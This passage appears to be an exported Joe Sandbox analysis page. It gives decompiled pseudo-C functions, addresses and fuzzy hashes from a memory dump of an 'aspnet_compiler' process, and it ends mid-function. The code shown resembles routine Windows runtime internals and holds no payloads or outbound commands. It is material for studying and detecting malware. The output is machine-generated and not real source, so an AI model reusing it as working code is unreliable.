Instruction ID: 4c0c17efa065c0c86a5d11b92a36343d2fb79be8247ce535c59c8733668052c3
Opcode Fuzzy Hash: db9268526324bf20909f9c82124c7d85825646fcabe435db9dddc2bf72c249db
Instruction Fuzzy Hash: 74219D72900604EFC729DF69D891EABBBB8EF48340F10056DEA1AC7790D734E900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 010FAE73 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E010FAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E010F7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E010F7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E010F7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E010F7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01157794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x010fae78
0x010fae7c
0x010fae7e
0x010fae81
0x010fae86
0x010fae8d
0x01142691
0x010fae93
0x010fae93
0x010fae93
0x010fae98
0x010fae9d
0x011426a2
0x011426b4
0x011426a4
0x011426ad
0x011426ad
0x011426b9
0x00000000
0x011426bb
0x00000000
0x011426bb
0x010faea3
0x010faea3
0x010faea3
0x010faeaa
0x011426c0
0x011426c9
0x011426c9
0x010faeb3
0x011426d4
0x011426e1
0x00000000
0x00000000
0x011426e7
0x011426ee
0x011426f0
0x011426f9
0x011426f9
0x01142702
0x01142708
0x01142708
0x0114270b
0x0114270f
0x01142711
0x01142711
0x01142725
0x01142725
0x00000000
0x010faeb9
0x010faeb9
0x010faebf
0x010faebf
0x010faeb3

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 2bef825c105886a69b6d81962d102f7d04db5191623961cd2286cb767676709b
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 0C21F672701681DFE71ADF2DD945B657BE8EF44B40F1900A4EE488BB92D778DC80C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 0110FD9B Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0110FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E010E76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L010F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0110fd9b
0x0110fda0
0x0110fda1
0x0110fdab
0x0110fdad
0x0110fdb0
0x0110fdb8
0x0110fe0f
0x0110fde6
0x0110fde9
0x0110fdec
0x0114c0c0
0x0110fdfe
0x0110fe06
0x0110fe06
0x0114c0c8
0x0110fe2d
0x0110fe2d
0x00000000
0x0110fe2d
0x0114c0d1
0x0114c0e0
0x0114c0e5
0x0114c0e5
0x0114c0e8
0x00000000
0x0114c0e8
0x0110fdf4
0x00000000
0x00000000
0x0110fdf6
0x0110fdfa
0x0110fe1a
0x0110fe1f
0x0110fe1f
0x0110fdfc
0x00000000
0x0110fdfc
0x0110fdcc
0x0110fdd0
0x0110fe26
0x00000000
0x0110fe26
0x0110fdd8
0x0110fddb
0x0110fddd
0x0110fde0
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: f626a90ea80155d3c6c625ceab554a6dd9872ba739d92cdc42b74343f9372e0c
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: FF21AC76A00642DFD73ACF0DC541A66B7E5EB94B10F22806EE94587A61D770AC02CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0110B390 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0110B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E010F2280(_t12, 0x11c8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E011100C2(0x11c8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0110b395
0x0110b3a2
0x0110b3a5
0x0110b3aa
0x0110b3b2
0x0110b3ba
0x0110b3bd
0x0110b3c0
0x0110b3c4
0x0110b3c9
0x0114a3e9
0x0114a3ed
0x0114a3f0
0x0114a3ff
0x0114a403
0x0114a409
0x00000000
0x00000000
0x0114a40b
0x0114a40b
0x0114a40f
0x0114a415
0x0114a423
0x0114a423
0x0114a415
0x0110b3d1
0x0110b3e8
0x0110b3e8
0x0110b3d9

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d92814bfee168bffebf0dfcead8d754e86cb82e652effea582630f238613e8e5
Instruction ID: 54536e9801d48170c4c7a27f5c0e233bf083ceae528c8cea1f8fdfd8b8ccec00
Opcode Fuzzy Hash: d92814bfee168bffebf0dfcead8d754e86cb82e652effea582630f238613e8e5
Instruction Fuzzy Hash: FD118C377091205BCB1E9A199E8156B7367EBD5630B39412DDE169B3C0DF719C02C299

Uniqueness

Uniqueness Score: -1.00%

Function 010D9240 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E010D9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x11af708);
				E0112D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E011195D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E011195D0();
				_t33 =  *0x11c84c4; // 0x0
				L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x11c84c4; // 0x0
				L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x11c84c4; // 0x0
				E010F2280(L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x11c86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E011195D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E011195D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E010D9325();
					_t50 =  *0x11c84c4; // 0x0
					return E0112D0D1(L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x010d9240
0x010d9242
0x010d9247
0x010d924c
0x010d924e
0x010d9255
0x010d9257
0x010d925a
0x010d925f
0x010d925f
0x010d9266
0x010d9271
0x010d9276
0x010d9279
0x010d927e
0x010d9295
0x010d929a
0x010d92b1
0x010d92b6
0x010d92d7
0x010d92dc
0x010d92e0
0x010d92e6
0x010d92e8
0x010d92ee
0x010d9332
0x010d9333
0x010d9337
0x010d9338
0x010d933a
0x010d933a
0x010d933d
0x010d9342
0x010d9342
0x010d9345
0x010d9349
0x010d934e
0x010d9352
0x010d9357
0x010d92f4
0x010d92f4
0x010d92f6
0x010d92f9
0x010d9300
0x010d9306
0x010d9324
0x010d9324

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7c2526fdc1b5b6ca51f892ef5912eb459a382e36fddc8c8b26580c3f17c3067d
Instruction ID: 64649a8baa394fc58a5633c1113f71ac528bf401113f233e2188ba43fb3c3f68
Opcode Fuzzy Hash: 7c2526fdc1b5b6ca51f892ef5912eb459a382e36fddc8c8b26580c3f17c3067d
Instruction Fuzzy Hash: 69213931051701DFC766EF68CA41F9ABBF9FF28708F14456CE18996AA2CB34E951CB44

Uniqueness

Uniqueness Score: -1.00%

Function 01164257 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E01164257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x11b08d0);
				E0112D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E011641E8(__ebx, __edi, __ecx, _t39);
				E010EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x11c87e4;
					_t18 =  *0x11c87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x11c5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x11c87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x11c87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L010D7055(_t31 + 0xfffffff8);
								_t24 =  *0x11c87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x11c87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x11c5cd0;
				if( *0x11c5cd0 <= 0) {
					L010D7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x11c87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x11c87e8 = _t30;
						 *0x11c87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0112D0D1(L01164320());
			}

0x01164257
0x01164257
0x01164257
0x01164259
0x0116425e
0x01164263
0x01164265
0x01164273
0x01164278
0x0116427c
0x0116427f
0x01164281
0x01164287
0x011642d7
0x011642d7
0x011642da
0x0116428d
0x0116428d
0x0116428f
0x01164292
0x01164297
0x0116429c
0x011642a0
0x011642a6
0x011642a8
0x011642ae
0x011642b3
0x00000000
0x011642ba
0x011642ba
0x011642bf
0x011642c5
0x011642ca
0x011642cf
0x011642d0
0x00000000
0x011642d0
0x011642b3
0x00000000
0x011642a6
0x0116429c
0x011642dc
0x011642dc
0x011642e3
0x01164309
0x011642e5
0x011642e5
0x011642e8
0x011642ee
0x011642f0
0x00000000
0x011642f2
0x011642f2
0x011642f4
0x011642f7
0x011642f9
0x01164300
0x01164300
0x011642f0
0x0116430e
0x0116431f

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9b3fded564a1de54aea4ee716e27897309223c658258998a8b4bf9c1ff6df21
Instruction ID: 7d97cbc7fa0555392e505c1adb5e22e61a37a8cc1c1e29fd0a4fdcf95a833517
Opcode Fuzzy Hash: a9b3fded564a1de54aea4ee716e27897309223c658258998a8b4bf9c1ff6df21
Instruction Fuzzy Hash: D3219071601B01CFC72DEF68E0806547FF5FB45358B20826ED1658BA99E732D4A1CF01

Uniqueness

Uniqueness Score: -1.00%

Function 01102397 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E01102397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x11c848c != 0) {
					L010FFAD0(0x11c8610);
					if( *0x11c848c == 0) {
						E010FFA00(0x11c8610, _t19, _t27, 0x11c8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01102581(0x11c8610, 0x10b50a0, _t26, _t27, _t28);
						E010FFA00(0x11c8610, 0x10b50a0, _t27, 0x11c8610);
					}
				} else {
					L1:
					_t11 =  *0x11c8614; // 0x0
					if(_t11 == 0) {
						_t11 = E01114886(0x10b1088, 1, 0x11c8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01102581(0x11c8610, (_t11 << 4) + 0x10b5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x011023b0
0x011023b6
0x01102409
0x01102415
0x01145ae9
0x00000000
0x0110241b
0x0110241b
0x0110241d
0x01102427
0x0110242e
0x01102430
0x01102430
0x011023b8
0x011023b8
0x011023b8
0x011023bf
0x011023fc
0x011023fc
0x011023c1
0x011023c3
0x011023d0
0x011023d8
0x011023d8
0x011023dc
0x011023de
0x011023e1
0x011023e1
0x011023ec

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3a38840f82ef8ed24e39a1799be837daf9d1600402552cf3829ef5a4ae13831
Instruction ID: 5e035d5a43e1ae289a632fcd762427fea01793896b9532c317c3cfe69663303c
Opcode Fuzzy Hash: f3a38840f82ef8ed24e39a1799be837daf9d1600402552cf3829ef5a4ae13831
Instruction Fuzzy Hash: E3116B72B043016BE73E9629ECC4B55B788BB64710F15402AF746EB2C0CBF0E841C754

Uniqueness

Uniqueness Score: -1.00%

Function 011546A7 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E011546A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L010F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0111F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0110D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L010F77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x011546b7
0x011546ba
0x011546c5
0x011546c8
0x011546d0
0x011546d4
0x011546e6
0x011546e9
0x011546f4
0x011546ff
0x01154705
0x01154706
0x0115470c
0x01154713
0x0115471b
0x01154723
0x01154725
0x011546d6
0x011546d9
0x011546db
0x011546db
0x01154732

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 9ade42c0677e77102a89dd20996c02e1c9de1ac894e6651992ae9af18ea96287
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: ED110272904208BBCB099F5C98808BEB7B9EF99304F10806EF984C7351DB318D55C3A5

Uniqueness

Uniqueness Score: -1.00%

Function 011137F5 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E011137F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E010F2280(_t6, 0x11c8550);
				}
				_t29 = E0111387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E010EFFB0(0x11c8550, _t27, 0x11c8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x011137fa
0x011137fc
0x01113805
0x01113808
0x01113808
0x01113814
0x01113818
0x01113846
0x01113848
0x0111384b
0x0111384b
0x01113852
0x00000000
0x01113854
0x01113856
0x00000000
0x00000000
0x01113863
0x00000000
0x01113863
0x0111381a
0x0111381a
0x0111381f
0x0111386e
0x0111386e
0x01113871
0x01113873
0x01113873
0x01113868
0x00000000
0x01113868
0x01113821
0x01113826
0x00000000
0x00000000
0x01113828
0x0111382a
0x01113841
0x00000000
0x01113841

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7068f268ed59e92a00c76b30b63f012c7a61780ee86d84b1e84d6a6b417ea293
Instruction ID: a421890b5d2982d888cf40dc281ad1bf879f05d379be31c80ca31ce61d593f9a
Opcode Fuzzy Hash: 7068f268ed59e92a00c76b30b63f012c7a61780ee86d84b1e84d6a6b417ea293
Instruction Fuzzy Hash: D50104B2911A119BC33F8B1ED940A26FBA6FF81A70716417DED698B24DC730C801C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 0110002D Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0110002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E010F7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E010F7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E010F7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E010F7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x01100032
0x01100037
0x01100043
0x01144b3a
0x01100049
0x01100049
0x01100049
0x0110004e
0x01100053
0x01144b48
0x01144b5a
0x01144b4a
0x01144b53
0x01144b53
0x01144b5f
0x00000000
0x01144b61
0x00000000
0x01144b61
0x01100059
0x01100059
0x01100060
0x01144b6f
0x01144b6f
0x01100069
0x01144b83
0x00000000
0x00000000
0x01144b90
0x01144b9b
0x01144b9b
0x01144ba4
0x00000000
0x00000000
0x01144baa
0x00000000
0x0110006f
0x0110006f
0x00000000
0x0110006f
0x01100069

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 17e174196d0bde24cff69e1e43f0dc1b48049f499ad1a436200480310451b6ac
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: AE110432A016828FE72BD72CC944B353BE4AF48BD4F1E00A0EE0487FD2D769C841C262

Uniqueness

Uniqueness Score: -1.00%

Function 010E766D Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E010E766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0110F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0110F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
